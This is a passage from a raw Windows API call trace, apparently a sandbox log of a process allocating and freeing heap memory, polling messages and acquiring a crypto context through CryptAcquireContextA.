wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0254.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0254.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0254.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0254.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0254.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0254.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0254.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0254.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0254.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0254.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0254.660] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0254.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0254.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0254.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0254.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0254.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0254.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0254.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0254.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0254.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0254.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0254.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0254.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0254.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0254.661] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0254.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0254.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0254.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0254.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0254.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0254.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0254.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0254.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0254.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0254.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0254.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0254.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0254.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0254.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0254.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0254.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0254.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0254.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0254.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0254.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0254.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0254.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0254.662] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0254.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0254.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0254.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0254.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0254.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0254.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0254.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0254.662] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0254.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0254.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0254.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0254.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0254.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0254.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0254.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0254.662] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0254.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0254.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0254.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0254.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0254.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55dc0 [0254.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0254.663] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0254.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55dc0 | out: hHeap=0x970000) returned 1 [0254.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0254.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51568 [0254.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0254.663] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0254.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0254.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0254.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0254.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0254.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0254.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0254.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0254.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0254.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0254.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0254.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0254.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0254.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0254.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0254.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0254.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0254.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0254.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0254.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0254.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0254.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0254.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0254.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0254.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0254.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0254.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0254.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0254.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0254.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0254.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0254.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0254.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0254.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0254.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0254.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0254.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0254.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0254.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0254.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0254.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0254.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0254.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0254.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0254.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0254.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0254.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0254.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0254.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0254.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0254.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0254.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0254.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0254.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0254.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0254.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0254.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0254.665] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0254.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0254.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0254.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0254.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0254.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0254.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0254.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0254.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0254.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0254.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0254.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0254.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0254.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0254.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0254.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0254.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0254.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0254.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0254.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0254.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0254.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0254.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0254.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0254.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0254.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0254.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0254.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0254.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0254.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0254.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0254.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0254.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0254.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0254.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0254.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0254.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0254.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0254.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0254.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0254.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0254.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0254.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0254.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0254.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0254.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0254.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0254.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0254.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0254.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0254.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0254.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0254.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0254.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0254.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0254.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0254.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0254.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0254.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0254.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0254.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e699c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0254.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0254.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0254.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0254.668] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0254.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0254.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0254.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0254.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0254.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0254.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0254.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0254.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69b88 [0254.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0254.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0254.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0254.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0254.668] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0254.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0254.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0254.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0254.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0254.669] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0254.670] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0254.670] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0254.670] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0254.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d88 | out: hHeap=0x970000) returned 1 [0254.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0254.671] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0254.671] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0254.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0254.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0254.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0254.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0254.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0254.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0254.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0254.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0254.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0254.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0254.671] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0254.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0254.671] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 